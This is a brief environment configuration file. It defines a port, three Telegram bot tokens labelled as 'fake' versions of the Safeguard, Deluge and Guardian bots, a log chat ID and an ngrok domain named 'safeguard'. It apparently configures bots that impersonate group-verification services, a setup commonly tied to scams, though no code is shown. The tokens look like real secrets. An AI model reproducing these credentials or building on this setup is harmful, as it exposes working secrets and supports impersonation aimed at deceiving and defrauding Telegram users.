PORT=4040
FAKE_SAFEGUARD_BOT_TOKEN="7560979885:AAEFVdctfNq8-2oZrDDP7ovsBDiGDaXXo2Q"
FAKE_DELUGE_BOT_TOKEN="7638697708:AAEaTEvaI_Q1ujXXGSCPsZqhiXGRDNOneM8"
FAKE_GUARDIAN_BOT_TOKEN="7836607769:AAFAo-__i_yg4J2owta9DZ2uUEA95VGe-AY"
LOGS_ID="-4628548048"
DOMAIN="https://safeguard.ngrok-free.dev"